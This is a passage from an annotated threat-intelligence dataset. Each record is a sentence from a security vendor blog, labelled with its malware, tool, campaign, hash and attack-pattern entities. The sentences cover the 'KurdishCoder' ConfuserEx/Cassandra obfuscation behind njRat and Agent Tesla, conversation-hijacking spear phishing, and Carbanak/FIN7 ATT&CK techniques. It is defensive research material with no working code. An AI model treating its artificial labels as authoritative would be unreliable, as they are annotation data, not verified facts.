name the potential campaign associated with these IoCs as “KurdishCoder”, based on the property name of an assembly module found in one of the samples.","entities":[{"id":49336,"label":"campaign","start_offset":73,"end_offset":85}],"relations":[],"Comments":[]} -{"id":3555,"text":"We took a look at one of the samples captured from Capesand that was used to deploy the njRat malware – notably its main executable NotepadEx.","entities":[{"id":10758,"label":"malware","start_offset":88,"end_offset":93},{"id":49337,"label":"malware","start_offset":51,"end_offset":59}],"relations":[{"id":786,"from_id":49337,"to_id":10758,"type":"delivers"}],"Comments":[]} -{"id":3556,"text":"We found that were multiple layers of obfuscation using a combination of two tools: the .NET protectors ConfuserEx and Cassandra (CyaX).","entities":[{"id":49338,"label":"tools","start_offset":104,"end_offset":114},{"id":49339,"label":"tools","start_offset":119,"end_offset":135}],"relations":[],"Comments":[]} -{"id":3557,"text":"Both of these tools are used in combination to provide an array of fully undetectable capabilities to the deployed njRat malware variant.","entities":[{"id":49340,"label":"malware","start_offset":115,"end_offset":120}],"relations":[],"Comments":[]} -{"id":3558,"text":"Examining the Capesand samples The simplified diagram taken from the previous blog shows the combination of ConfuserEx and Cassandra via the second layer of obfuscation protection, which involves the DLL CyaX_Sharp Assembly (both CyaX_Sharp and CyaX are part of the Cassandra protector).","entities":[{"id":49341,"label":"malware","start_offset":14,"end_offset":22},{"id":49342,"label":"tools","start_offset":108,"end_offset":118},{"id":49343,"label":"tools","start_offset":123,"end_offset":132},{"id":49344,"label":"tools","start_offset":230,"end_offset":240},{"id":49345,"label":"tools","start_offset":245,"end_offset":249},{"id":49346,"label":"tools","start_offset":266,"end_offset":285}],"relations":[{"id":787,"from_id":49341,"to_id":49342,"type":"uses"},{"id":788,"from_id":49341,"to_id":49343,"type":"uses"}],"Comments":[]} -{"id":3559,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} -{"id":3560,"text":"The infection chain for Capesand that also shows the obfuscation mechanisms For this particular sample, CyaX_Sharp is obfuscated with a customized version of ConfuserEx.","entities":[{"id":49348,"label":"tools","start_offset":104,"end_offset":114},{"id":49349,"label":"tools","start_offset":158,"end_offset":168},{"id":49347,"label":"malware","start_offset":24,"end_offset":32}],"relations":[],"Comments":[]} -{"id":3561,"text":"The following image shows an assembly module property that was generated for this sample.","entities":[],"relations":[],"Comments":[]} -{"id":3562,"text":"Figure 2.","entities":[],"relations":[],"Comments":[]} -{"id":3563,"text":"The generated assembly module property","entities":[],"relations":[],"Comments":[]} -{"id":3564,"text":"The module’s property name is “KurdishCoderProducts”, with a value shown to be “ConfuserEx v1.0.0-custom”.","entities":[],"relations":[],"Comments":[]} -{"id":3565,"text":" To understand where this value is coming from, let’s take a look at the open-source ConfuserEx tool to see how the values are created.","entities":[{"id":49350,"label":"tools","start_offset":85,"end_offset":96}],"relations":[],"Comments":[]} -{"id":3566,"text":"From there, we can establish a hypothesis as to their source.","entities":[],"relations":[],"Comments":[]} -{"id":3567,"text":"A closer look at ConfuserEx’s functions","entities":[{"id":49351,"label":"tools","start_offset":17,"end_offset":27}],"relations":[],"Comments":[]} -{"id":3568,"text":"While ConfuserEx is able to apply multiple transformations to the target binary, we are interested in two particular functions that we can use for correlation: Source code building.","entities":[{"id":49352,"label":"tools","start_offset":6,"end_offset":16}],"relations":[],"Comments":[]} -{"id":3569,"text":" ConfuserEx is an open-source tool with multiple versions hosted on Github.","entities":[{"id":49353,"label":"tools","start_offset":1,"end_offset":11}],"relations":[],"Comments":[]} -{"id":3570,"text":" By examining one of the community-supported versions, we can see there is a tool to build ConfuserEx from the command line.","entities":[{"id":49354,"label":"tools","start_offset":91,"end_offset":101}],"relations":[],"Comments":[]} -{"id":3571,"text":"This build command line has a function to update the final binary versions based on the last Git-tagged version.","entities":[],"relations":[],"Comments":[]} -{"id":3572,"text":"However, if ConfuserEx is built outside Git, the version update tool will just generate the value “version-custom” as shown below.","entities":[{"id":49355,"label":"tools","start_offset":12,"end_offset":22},{"id":49356,"label":"tools","start_offset":40,"end_offset":43}],"relations":[],"Comments":[]} -{"id":3573,"text":"Figure 3.","entities":[],"relations":[],"Comments":[]} -{"id":3574,"text":"Code taken from a ConfuserEx version created outside GIT","entities":[{"id":49358,"label":"tools","start_offset":53,"end_offset":56},{"id":49357,"label":"tools","start_offset":18,"end_offset":28}],"relations":[],"Comments":[]} -{"id":3575,"text":"Since the string “ConfuserEx v1.0.0-custom” is present in the module property: [module: KurdishCoderProducts(\"ConfuserEx v1.0.0-custom\")]”, we can surmise that the version of ConfuserEx that was used for CyaX_Sharp was indeed built outside of Git.","entities":[{"id":49359,"label":"tools","start_offset":175,"end_offset":185},{"id":49360,"label":"tools","start_offset":204,"end_offset":214},{"id":49361,"label":"tools","start_offset":243,"end_offset":246}],"relations":[],"Comments":[]} -{"id":3576,"text":" 2. Watermarking","entities":[],"relations":[],"Comments":[]} -{"id":3577,"text":"When ConfuserEx performs its obfuscation routine, one of the operations creates a watermark – a unique identifier within the software--that is present in the final binary.","entities":[{"id":49362,"label":"tools","start_offset":5,"end_offset":15}],"relations":[],"Comments":[]} -{"id":3578,"text":"The watermarking technique is implemented through the module attributes of the assembly.","entities":[],"relations":[],"Comments":[]} -{"id":3579,"text":"The following source code screenshot shows how this is implemented.","entities":[],"relations":[],"Comments":[]} -{"id":3580,"text":"Figure 4. Code showing how the watermarking is performed via the module attributes of the assembly","entities":[],"relations":[],"Comments":[]} -{"id":3581,"text":"From the previous code section, we can see the default attribute added by ConfuserEx is “ConfusedBy”.","entities":[{"id":49363,"label":"tools","start_offset":74,"end_offset":84}],"relations":[],"Comments":[]} -{"id":3582,"text":"If we test it using a sample binary, the following is generated: Figure 5. Testing a sample binary using ConfuserEx There are two important aspects to this attribute: first, it is hardcoded as a string constant and second, its value is presented in clear text in the final binary as the following image shows.","entities":[{"id":49364,"label":"tools","start_offset":106,"end_offset":116}],"relations":[],"Comments":[]} -{"id":3583,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} -{"id":3584,"text":"The default attribute shown in clear text in the final binary We now have solid evidence that CyaX_Sharp was obfuscated using a modified version of ConfuserEx.","entities":[{"id":49365,"label":"tools","start_offset":94,"end_offset":104},{"id":49366,"label":"tools","start_offset":148,"end_offset":158}],"relations":[],"Comments":[]} -{"id":3585,"text":"Next, let’s look for the attribute indicator, starting with the CyaX assembly used in the NotepadEx attack.","entities":[{"id":49368,"label":"campaign","start_offset":90,"end_offset":99},{"id":49367,"label":"tools","start_offset":64,"end_offset":68}],"relations":[{"id":789,"from_id":49368,"to_id":49367,"type":"uses"}],"Comments":[]} -{"id":3586,"text":" Cassandra Protector: CyaX","entities":[{"id":49369,"label":"tools","start_offset":1,"end_offset":10},{"id":49370,"label":"tools","start_offset":22,"end_offset":26}],"relations":[],"Comments":[]} -{"id":3587,"text":"After inspection we noticed that this version of CyaX was similarly notable due to two characteristics.","entities":[{"id":49371,"label":"tools","start_offset":49,"end_offset":53}],"relations":[],"Comments":[]} -{"id":3588,"text":"First, the debug symbols paths were leaked -- suggesting a possible custom build which can be correlated with another modification applied to CyaX. Figure 7.","entities":[{"id":49372,"label":"tools","start_offset":142,"end_offset":146}],"relations":[],"Comments":[]} -{"id":3589,"text":"The leaked debug symbols paths","entities":[],"relations":[],"Comments":[]} -{"id":3590,"text":"The second indicator has to do with one of the methods of CyaX which was modified -- specifically the one injecting the binary in memory.","entities":[{"id":49373,"label":"tools","start_offset":58,"end_offset":62}],"relations":[],"Comments":[]} -{"id":3591,"text":"The following image shows the modified function name.","entities":[],"relations":[],"Comments":[]} -{"id":3592,"text":" Figure 8.","entities":[],"relations":[],"Comments":[]} -{"id":3593,"text":"The modified method which was renamed to Kirkuk, which is also a name of a city in Iraq What other payloads are using KurdishCoder?","entities":[],"relations":[],"Comments":[]} -{"id":3594,"text":"Analysis of some of the captured samples reveals the different payloads being used (as shown in the table below).","entities":[],"relations":[],"Comments":[]} -{"id":3595,"text":"Note that this does not cover all the samples – it is possible that other payloads are being deployed as well.","entities":[],"relations":[],"Comments":[]} -{"id":3596,"text":" Sample Payload KurdishCoderMainSample KurdishCoder_CyaX_Sharp CyaX_method_rename CustomIncreaseX phoenix_keylogger Yes Yes Kirkuk NotePadEx Njrat No Yes Kirkuk QuickTranslation Agent Tesla Yes Yes Kurd SandiwchGenerator Agent Tesla Yes Yes Kirkuk SimpleGame Remcos Yes Yes Kirkuk AnimalGames Hawkeye Rebord Keylogger Yes Yes Kurd Table 1.","entities":[{"id":49374,"label":"malware","start_offset":178,"end_offset":189},{"id":49376,"label":"malware","start_offset":259,"end_offset":265},{"id":49375,"label":"malware","start_offset":221,"end_offset":232},{"id":49377,"label":"malware","start_offset":293,"end_offset":317}],"relations":[],"Comments":[]} -{"id":3597,"text":"The different samples organized name, payload delivered and the fully-undetectable stages where the attribute “KurdishCoderProduction” is present","entities":[],"relations":[],"Comments":[]} -{"id":3598,"text":"Cassandra Crypter","entities":[{"id":49378,"label":"tools","start_offset":0,"end_offset":17}],"relations":[],"Comments":[]} -{"id":3599,"text":"We think one of the possible sources of the customized ConfuserEx is the online service Cassandra Crypter, which offers two kinds of subscription plans: The Premium Plan and the Private Stub.","entities":[{"id":49380,"label":"tools","start_offset":88,"end_offset":105},{"id":49379,"label":"tools","start_offset":55,"end_offset":65}],"relations":[],"Comments":[]} -{"id":3600,"text":"The Premium Plan requires payment and works automatically, while the Private Stub requires the user to contact the support from the service for further personalization.","entities":[],"relations":[],"Comments":[]} -{"id":3601,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} -{"id":3602,"text":"Cassandra Crypter’s subscription plans","entities":[{"id":49381,"label":"tools","start_offset":0,"end_offset":17}],"relations":[],"Comments":[]} -{"id":3603,"text":"The combination of ConfuserEx and CyaX (Cassandra protector) seems to be unique and customized based on the indicators mentioned earlier.","entities":[{"id":49382,"label":"tools","start_offset":19,"end_offset":29},{"id":49383,"label":"tools","start_offset":34,"end_offset":39},{"id":49384,"label":"tools","start_offset":40,"end_offset":59}],"relations":[],"Comments":[]} -{"id":3604,"text":" While we don’t have definitive evidence that the use of these tools are part of a single campaign, we think the analyzed samples are related to a specific campaign.","entities":[],"relations":[],"Comments":[]} -{"id":3605,"text":"Note that the KurdishCoder indicator was spotted also by the Italian Computer Emergency Response Team - Pubblica Amministrazione (CERT-PA), which they reported as a single incident.","entities":[{"id":49385,"label":"identity","start_offset":61,"end_offset":138}],"relations":[],"Comments":[]} -{"id":3606,"text":"As with Capesand, we will be monitoring the use of the tools mentioned in this blog entry for any future developments and updates.","entities":[{"id":49386,"label":"malware","start_offset":8,"end_offset":16}],"relations":[],"Comments":[]} -{"id":3607,"text":"Trend Micro Solutions","entities":[{"id":49387,"label":"identity","start_offset":0,"end_offset":21}],"relations":[],"Comments":[]} -{"id":3608,"text":"A proactive, multilayered approach to security is key against a wide range of threats— from the gateway, endpoints, networks, and servers.","entities":[],"relations":[],"Comments":[]} -{"id":3609,"text":"Trend Micro™ endpoint security has vulnerability protection that shields endpoints from identified and unknown vulnerability exploits even before patches are even deployed.","entities":[{"id":49388,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":3610,"text":"Trend Micro’s endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security protect end users and businesses from these threats by detecting and blocking malicious files and all related malicious URLs.","entities":[{"id":49389,"label":"identity","start_offset":0,"end_offset":11},{"id":49390,"label":"identity","start_offset":41,"end_offset":52}],"relations":[],"Comments":[]} -{"id":3611,"text":"Indicators of Compromise (IoCs) Indicator Attribution Trend Micro Pattern Detection 068d32a43191dc0164b600b85a1621be0154504fd477167422ff4a8fb3406d73 AnimalGames Backdoor.","entities":[{"id":10902,"label":"SHA2","start_offset":85,"end_offset":149},{"id":49391,"label":"identity","start_offset":55,"end_offset":66},{"id":49392,"label":"malware","start_offset":150,"end_offset":170}],"relations":[{"id":790,"from_id":10902,"to_id":49392,"type":"indicates"}],"Comments":[]} -{"id":3612,"text":"MSIL.BLADABINDI.QBR","entities":[{"id":49393,"label":"malware","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} -{"id":3613,"text":"07be156caac1157707ffe38266dc60abadc488226b4f41d67f23eac98dd917b0","entities":[{"id":10903,"label":"SHA2","start_offset":0,"end_offset":64}],"relations":[],"Comments":[]} -{"id":3614,"text":"CustomIncreaseX Backdoor.MSIL.BLADABINDI.QBR b00cc9a4292fc5cc4ae5371ea1615ec6e49ebaf061dc4eccde84a6f96d95747c NotePadEx Backdoor.MSIL.BLADABINDI.QBR 6755ce7a362ffecef805e4c54e1d5e201b6c6d561b997ebbd63a8d814ce6a53f QuickTranslation Backdoor.MSIL.BLADABINDI.QBR 8ff11efc1109073fdc49be93e1d100992314fd68ecdff2ba986107602ce75089 SandwichGenerator Backdoor.MSIL.BLADABINDI.QBR 02f2369b58fbb2ba1df2c799b73842880a4874c32c1514a0d8956133be026ade SimpleGame Backdoor.Win32.REMCOS.USMANEAGDZ","entities":[{"id":10904,"label":"SHA2","start_offset":45,"end_offset":109},{"id":10905,"label":"SHA2","start_offset":149,"end_offset":213},{"id":10907,"label":"SHA2","start_offset":372,"end_offset":436},{"id":10906,"label":"SHA2","start_offset":260,"end_offset":324},{"id":49394,"label":"malware","start_offset":16,"end_offset":44},{"id":49395,"label":"malware","start_offset":120,"end_offset":148},{"id":49396,"label":"malware","start_offset":231,"end_offset":259},{"id":49398,"label":"malware","start_offset":448,"end_offset":480},{"id":49397,"label":"malware","start_offset":343,"end_offset":371}],"relations":[],"Comments":[]} -{"id":3615,"text":" Tags Mobile | APT & Targeted Attacks | Research","entities":[],"relations":[],"Comments":[]} -{"id":3616,"text":"Spear Phishing is a specific attack technique that has become widely used in the past few years.","entities":[{"id":10910,"label":"attack-pattern","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} -{"id":3617,"text":"In our new research blog “FreeMilk: A Highly Targeted Spear Phishing Campaign”, our Unit 42 research team has discovered an attack campaign that takes spear phishing targeting to the next level by hijacking in-progress email conversations.","entities":[{"id":49399,"label":"identity","start_offset":84,"end_offset":105},{"id":49400,"label":"attack-pattern","start_offset":151,"end_offset":165},{"id":49401,"label":"attack-pattern","start_offset":197,"end_offset":238},{"id":49402,"label":"campaign","start_offset":131,"end_offset":139}],"relations":[{"id":791,"from_id":49402,"to_id":49400,"type":"uses"},{"id":792,"from_id":49402,"to_id":49401,"type":"uses"}],"Comments":[]} -{"id":3618,"text":"While these are not broad attacks, they represent an escalation in attacker spear phishing techniques in a way that makes it even more important than ever to have a prevention framework in place.","entities":[{"id":49403,"label":"attack-pattern","start_offset":76,"end_offset":90}],"relations":[],"Comments":[]} -{"id":3619,"text":" Standard phishing attacks are broad attacks that use general email messages to carry out the attacks.","entities":[{"id":49404,"label":"attack-pattern","start_offset":10,"end_offset":26}],"relations":[],"Comments":[]} -{"id":3620,"text":"Standard phishing attacks aren’t personalized: they use very common themes or lures in a generalized way in conjunction with a large enough pool of targets.","entities":[{"id":49405,"label":"attack-pattern","start_offset":9,"end_offset":25}],"relations":[],"Comments":[]} -{"id":3621,"text":"The idea is that by chance some percentage of the phishing emails will look legitimate enough to the recipient to be successful.","entities":[{"id":49406,"label":"attack-pattern","start_offset":50,"end_offset":65}],"relations":[],"Comments":[]} -{"id":3622,"text":" Basically, standard phishing attacks rely on the law of averages for its success.","entities":[{"id":49407,"label":"attack-pattern","start_offset":21,"end_offset":37}],"relations":[],"Comments":[]} -{"id":3623,"text":"As such, it’s a suitable tactic when an attacker cares less about who falls for it than how many fall for it.","entities":[],"relations":[],"Comments":[]} -{"id":3624,"text":" A good example of a generalized phishing campaign is the Blank Slate Campaign we wrote about in March 2017.","entities":[{"id":49409,"label":"campaign","start_offset":58,"end_offset":78},{"id":49410,"label":"TIME","start_offset":97,"end_offset":107},{"id":49408,"label":"attack-pattern","start_offset":33,"end_offset":50}],"relations":[{"id":793,"from_id":49409,"to_id":49408,"type":"uses"}],"Comments":[]} -{"id":3625,"text":"This attack campaign was so generalized that the attackers didn’t even bother with any theme or lure: they simply sent blank messages with malicious attachments for the recipient to open.","entities":[],"relations":[],"Comments":[]} -{"id":3626,"text":" Spear phishing is a more refined and focused version of phishing.","entities":[{"id":10946,"label":"attack-pattern","start_offset":1,"end_offset":15},{"id":10948,"label":"attack-pattern","start_offset":57,"end_offset":65}],"relations":[],"Comments":[]} -{"id":3627,"text":"Instead of using generalized themes or lures, spear phishing uses themes or lures that are in some way relevant or appropriate for the target recipient.","entities":[{"id":49411,"label":"attack-pattern","start_offset":46,"end_offset":60}],"relations":[],"Comments":[]} -{"id":3628,"text":"For example, a spear phishing attack could use email messages about military exercises sent to military or government targets like we saw with our recent research into CMSTAR Trojan attacks.","entities":[{"id":10953,"label":"attack-pattern","start_offset":15,"end_offset":29},{"id":10954,"label":"malware","start_offset":168,"end_offset":174}],"relations":[{"id":794,"from_id":10954,"to_id":10953,"type":"uses"}],"Comments":[]} -{"id":3629,"text":"Because the malicious email has a context for the target, he or she is more likely to trust it and open the email message and any attachments.","entities":[],"relations":[],"Comments":[]} -{"id":3630,"text":" Spear phishing focuses on the quality of the theme and lure where standard phishing focuses on quantity.","entities":[{"id":49412,"label":"attack-pattern","start_offset":1,"end_offset":15},{"id":49413,"label":"attack-pattern","start_offset":76,"end_offset":84}],"relations":[],"Comments":[]} -{"id":3631,"text":"Spear phishing is a suitable tactic when an attacker cares about who falls for it.","entities":[{"id":10966,"label":"attack-pattern","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} -{"id":3632,"text":"Where a phishing attack campaign may send malicious emails out to thousands or tens of thousands of targets, a spear phishing campaign my send out just one malicious email to one target.","entities":[{"id":49414,"label":"attack-pattern","start_offset":8,"end_offset":23},{"id":49415,"label":"attack-pattern","start_offset":111,"end_offset":125}],"relations":[],"Comments":[]} -{"id":3633,"text":"Sometimes, when that target is a high-value target this attack can also be referred to as ‘Whaling”. In our new research, our Unit 42 research team has found an attack that takes the refining of spear phishing one step further.","entities":[{"id":49418,"label":"identity","start_offset":127,"end_offset":148},{"id":49416,"label":"attack-pattern","start_offset":196,"end_offset":210}],"relations":[],"Comments":[]} -{"id":3634,"text":"Rather than simply using a theme or lure that is relevant to the target, the attackers behind these attacks use an email conversation that’s in progress to carry out their attack.","entities":[],"relations":[],"Comments":[]} -{"id":3635,"text":" You can see an image of how this works below in Figure 1. Figure 1 Conversation Hijacking to Deliver Malware How this works is that two users, Alice (A) and Bob (B) are carrying on an email conversation.","entities":[],"relations":[],"Comments":[]} -{"id":3636,"text":"A shown in the top figure, an attacker, Charlie (C), carries out an attack that enables him to gain complete control of Alice’s email account, most likely through some form of credential theft.","entities":[],"relations":[],"Comments":[]} -{"id":3637,"text":"Once Charlie has access to Alice’s email account, he then finds email conversations between Alice and Bob, his ultimate target.","entities":[],"relations":[],"Comments":[]} -{"id":3638,"text":"When he finds one that is still in progress, he crafts a malicious attack email that seems to be relevant to the ongoing email conversation and sends it to Bob as shown in the bottom figure.","entities":[],"relations":[],"Comments":[]} -{"id":3639,"text":"If Charlie was successful in crafting the attack email to seem legitimate enough, Bob will open the email and any attachments and the attack will succeed. Unlike phishing or even general spear phishing, this is a highly sophisticated, labor intensive, focused attack.","entities":[{"id":49420,"label":"attack-pattern","start_offset":188,"end_offset":202},{"id":49419,"label":"attack-pattern","start_offset":163,"end_offset":171}],"relations":[],"Comments":[]} -{"id":3640,"text":"Carrying out a successful conversation hijacking spear phishing attack requires knowing someone that the ultimate target is communicating with, compromising that person’s account, identifying an ongoing email conversation with the ultimate target, crafting an email to appear part of that ongoing email conversation and finally sending it.","entities":[{"id":49421,"label":"attack-pattern","start_offset":49,"end_offset":63}],"relations":[],"Comments":[]} -{"id":3641,"text":"Even then there’s no guarantee of success since the target may somehow recognize the attack or have sufficient prevention controls in place to prevent the attack from succeeding.","entities":[],"relations":[],"Comments":[]} -{"id":3642,"text":" Given all those points, this isn’t an attack that many of us need to worry about.","entities":[],"relations":[],"Comments":[]} -{"id":3643,"text":"But those out there who are in positions that might make them a high value target do need to be concerned about this.","entities":[],"relations":[],"Comments":[]} -{"id":3644,"text":"Whether you’re on the board of directors for an organization, a CEO\/CFO\/CSO, entrusted with important military or political information, are a journalist, or an activist\/dissident, this is a kind of attack that you could face.","entities":[],"relations":[],"Comments":[]} -{"id":3645,"text":"And like with all targeted attacks, you don’t have to be the ultimate target of the attack campaign to be a target: this is a tactic that can be used as part of a broader attack campaign.","entities":[],"relations":[],"Comments":[]} -{"id":3646,"text":"For example, if you are the executive assistant for a CEO, you could be the target of an attack like this (“Bob” in our scenario above) so that you in turn are used to carry out an attack (“Alice” in our scenario above) against your CEO (who then becomes “Bob” in our scenario above). Because of the nature of the attack, unless you verify each and every email you receive, it’s unlikely that you’ll necessarily be able to spot and thwart an attack.","entities":[],"relations":[],"Comments":[]} -{"id":3647,"text":"In this case, your best means of protection lies in prevention.","entities":[],"relations":[],"Comments":[]} -{"id":3648,"text":"And prevention here is really focused on two things.","entities":[],"relations":[],"Comments":[]} -{"id":3649,"text":"First, keeping your systems and devices fully up-to-date with the latest software and security updates.","entities":[],"relations":[],"Comments":[]} -{"id":3650,"text":"The specific attack our Unit 42 research team has seen using this technique relied on an attack against a vulnerability in Microsoft Office for which a patch is available.","entities":[{"id":49422,"label":"identity","start_offset":24,"end_offset":45},{"id":49423,"label":"SOFTWARE","start_offset":123,"end_offset":139}],"relations":[],"Comments":[]} -{"id":3651,"text":"If an attacker tried to carry this attack out against a target that was patched for this vulnerability, it would fail.","entities":[],"relations":[],"Comments":[]} -{"id":3652,"text":" Second, using security on your systems, devices and networks that provides multiple layers of protection can help prevent attacks. Conversation hijacking spear phishing isn’t a threat everyone faces, but for those who do it represents a significant escalation in terms of sophistication and social engineering of spear phishing attacks.","entities":[{"id":49426,"label":"attack-pattern","start_offset":315,"end_offset":329},{"id":49424,"label":"attack-pattern","start_offset":156,"end_offset":170},{"id":49425,"label":"attack-pattern","start_offset":293,"end_offset":311}],"relations":[],"Comments":[]} -{"id":3653,"text":"It also takes spear phishing attacks to a level that makes it nearly impossible to distinguish an attack email from a legitimate email.","entities":[{"id":11070,"label":"attack-pattern","start_offset":14,"end_offset":28}],"relations":[],"Comments":[]} -{"id":3654,"text":"And so technological prevention controls (patching, robust security) are even more for effective prevention.","entities":[],"relations":[],"Comments":[]} -{"id":3655,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} -{"id":3656,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":3657,"text":"Constant monitoring of threat groups is one of the ways that security researchers and law enforcement agencies are able defend systems against cybercrime.","entities":[],"relations":[],"Comments":[]} -{"id":3658,"text":"Among these cybercriminals are financially motivated threat groups Carbanak and FIN7.","entities":[{"id":49428,"label":"threat-actor","start_offset":80,"end_offset":84},{"id":49427,"label":"threat-actor","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} -{"id":3659,"text":"Although both names have at times been used to refer to the same group, organizations such as MITRE identifies them as two separate entities that wield the Carbanak backdoor in their attacks.","entities":[{"id":49429,"label":"identity","start_offset":94,"end_offset":99},{"id":49432,"label":"malware","start_offset":156,"end_offset":173}],"relations":[],"Comments":[]} -{"id":3660,"text":"However, the groups use not just the Carbanak backdoor but also other types of malware such as Pillowmint, a point-of-sale malware, and Tirion, which is said to be geared to replace Carbanak.","entities":[{"id":49434,"label":"malware","start_offset":136,"end_offset":142},{"id":49431,"label":"malware","start_offset":37,"end_offset":55},{"id":49433,"label":"malware","start_offset":95,"end_offset":105},{"id":49435,"label":"malware","start_offset":182,"end_offset":190}],"relations":[],"Comments":[]} -{"id":3661,"text":"MITRE also identifies different main targets for each group: While Carbanak focuses on banking institutions, FIN7 targets food, hospitality, and retail establishments.","entities":[{"id":49437,"label":"threat-actor","start_offset":67,"end_offset":75},{"id":49438,"label":"threat-actor","start_offset":109,"end_offset":113},{"id":49436,"label":"identity","start_offset":0,"end_offset":5},{"id":49439,"label":"identity","start_offset":87,"end_offset":107},{"id":49440,"label":"identity","start_offset":122,"end_offset":166}],"relations":[{"id":795,"from_id":49437,"to_id":49439,"type":"targets"},{"id":796,"from_id":49438,"to_id":49440,"type":"targets"}],"Comments":[]} -{"id":3662,"text":"This week, the results of this year's round of the MITRE Engenuity ATT&CK Evaluations were released, which focused on Carbanak+FIN7.","entities":[{"id":49441,"label":"identity","start_offset":51,"end_offset":73},{"id":49442,"label":"threat-actor","start_offset":118,"end_offset":126},{"id":49443,"label":"threat-actor","start_offset":127,"end_offset":131}],"relations":[],"Comments":[]} -{"id":3663,"text":"We also separately discussed how Trend Micro solutions deal with these threats.","entities":[{"id":49444,"label":"identity","start_offset":33,"end_offset":44}],"relations":[],"Comments":[]} -{"id":3664,"text":"For more background on what happens in attacks launched by Carbanak and FIN7, we pieced together information from our studies of these groups as well as information from ATT&CK tactics and techniques (a total of 65 techniques across 11 tactics) identified by MITRE to be related to these threat groups.","entities":[{"id":49446,"label":"threat-actor","start_offset":72,"end_offset":76},{"id":49445,"label":"threat-actor","start_offset":59,"end_offset":67},{"id":49447,"label":"identity","start_offset":259,"end_offset":264}],"relations":[],"Comments":[]} -{"id":3665,"text":"What happens in Carbanak and FIN7 attacks?","entities":[{"id":49448,"label":"threat-actor","start_offset":16,"end_offset":24},{"id":49449,"label":"threat-actor","start_offset":29,"end_offset":33}],"relations":[],"Comments":[]} -{"id":3666,"text":"In our analysis of a related past campaign, we observed that attackers enter the system through spear phishing.","entities":[{"id":49450,"label":"attack-pattern","start_offset":96,"end_offset":110}],"relations":[],"Comments":[]} -{"id":3667,"text":"After gaining a foothold in the system, the dynamic data exchange (DDE) feature in Windows and legitimate cloud-based services will then be abused to deliver the malware or to establish command-and-control (C&C) communication.","entities":[{"id":49451,"label":"SOFTWARE","start_offset":83,"end_offset":90}],"relations":[],"Comments":[]} -{"id":3668,"text":"After this, the Carbanak backdoor can then be used to log keystrokes and capture screenshots, steal and delete cookies, inject malicious code on sites, and monitor various traffic.","entities":[{"id":49452,"label":"malware","start_offset":16,"end_offset":33},{"id":49453,"label":"attack-pattern","start_offset":54,"end_offset":68},{"id":49456,"label":"attack-pattern","start_offset":120,"end_offset":150},{"id":49457,"label":"attack-pattern","start_offset":156,"end_offset":179},{"id":49455,"label":"attack-pattern","start_offset":94,"end_offset":118},{"id":49454,"label":"attack-pattern","start_offset":73,"end_offset":92}],"relations":[{"id":797,"from_id":49452,"to_id":49453,"type":"uses"},{"id":798,"from_id":49452,"to_id":49454,"type":"uses"},{"id":799,"from_id":49452,"to_id":49455,"type":"uses"},{"id":800,"from_id":49452,"to_id":49456,"type":"uses"},{"id":801,"from_id":49452,"to_id":49457,"type":"uses"}],"Comments":[]} -{"id":3669,"text":"For lateral movement, the malware abuses remote and system administration tools.","entities":[{"id":49458,"label":"attack-pattern","start_offset":4,"end_offset":20},{"id":49459,"label":"attack-pattern","start_offset":34,"end_offset":79}],"relations":[],"Comments":[]} -{"id":3670,"text":"To be more specific in terms of ATT&CK® techniques, Carbanak and FIN7 share a notable number of similarities.","entities":[{"id":49461,"label":"threat-actor","start_offset":65,"end_offset":69},{"id":49460,"label":"threat-actor","start_offset":52,"end_offset":60}],"relations":[{"id":802,"from_id":49460,"to_id":49461,"type":"related-to"}],"Comments":[]} -{"id":3671,"text":"However, some techniques are only used by one of them, as we discuss in the subsequent sections.","entities":[],"relations":[],"Comments":[]} -{"id":3672,"text":" Figure 1. ATT&CK® tactics shared between Carbanak and FIN7 The following are the tactics and techniques that are employed by Carbanak and FIN7, as shared by MITRE.","entities":[{"id":49464,"label":"threat-actor","start_offset":135,"end_offset":143},{"id":49465,"label":"threat-actor","start_offset":148,"end_offset":152},{"id":49462,"label":"threat-actor","start_offset":46,"end_offset":54},{"id":49463,"label":"threat-actor","start_offset":59,"end_offset":63},{"id":49466,"label":"identity","start_offset":167,"end_offset":172}],"relations":[],"Comments":[]} -{"id":3673,"text":"Initial Access","entities":[],"relations":[],"Comments":[]} -{"id":3674,"text":"Both groups use spear-phishing campaigns with attachments that are embedded with exploits as an entry point to the target system.","entities":[{"id":49467,"label":"attack-pattern","start_offset":16,"end_offset":40}],"relations":[],"Comments":[]} -{"id":3675,"text":"Execution","entities":[],"relations":[],"Comments":[]} -{"id":3676,"text":"Successfully entering the system leads to the next step: executing the attack.","entities":[],"relations":[],"Comments":[]} -{"id":3677,"text":"For code and behavior execution, both groups use a variety of techniques through native API, PowerShell, service execution, user execution, Windows Component Object Model (COM) and Distributed COM, and Windows Management Instrumentation (WMI).","entities":[{"id":49468,"label":"tools","start_offset":93,"end_offset":103},{"id":49471,"label":"attack-pattern","start_offset":141,"end_offset":242},{"id":49469,"label":"attack-pattern","start_offset":105,"end_offset":122},{"id":49470,"label":"attack-pattern","start_offset":124,"end_offset":138}],"relations":[],"Comments":[]} -{"id":3678,"text":"Carbanak also abuses command-line interface and DDE client-server protocol.","entities":[{"id":49472,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} -{"id":3679,"text":"On the other hand, FIN7 takes advantage of Mshta, a utility that can execute VBScript, and scheduled tasks to run malicious code on user systems.","entities":[{"id":49473,"label":"threat-actor","start_offset":19,"end_offset":23},{"id":49474,"label":"tools","start_offset":43,"end_offset":48},{"id":49475,"label":"attack-pattern","start_offset":110,"end_offset":128}],"relations":[],"Comments":[]} -{"id":3680,"text":"Persistence","entities":[],"relations":[],"Comments":[]} -{"id":3681,"text":"Once the malicious behavior is executed, the attackers will attempt to keep their presence in a system.","entities":[],"relations":[],"Comments":[]} -{"id":3682,"text":"To maintain persistence, the groups create new services.","entities":[],"relations":[],"Comments":[]} 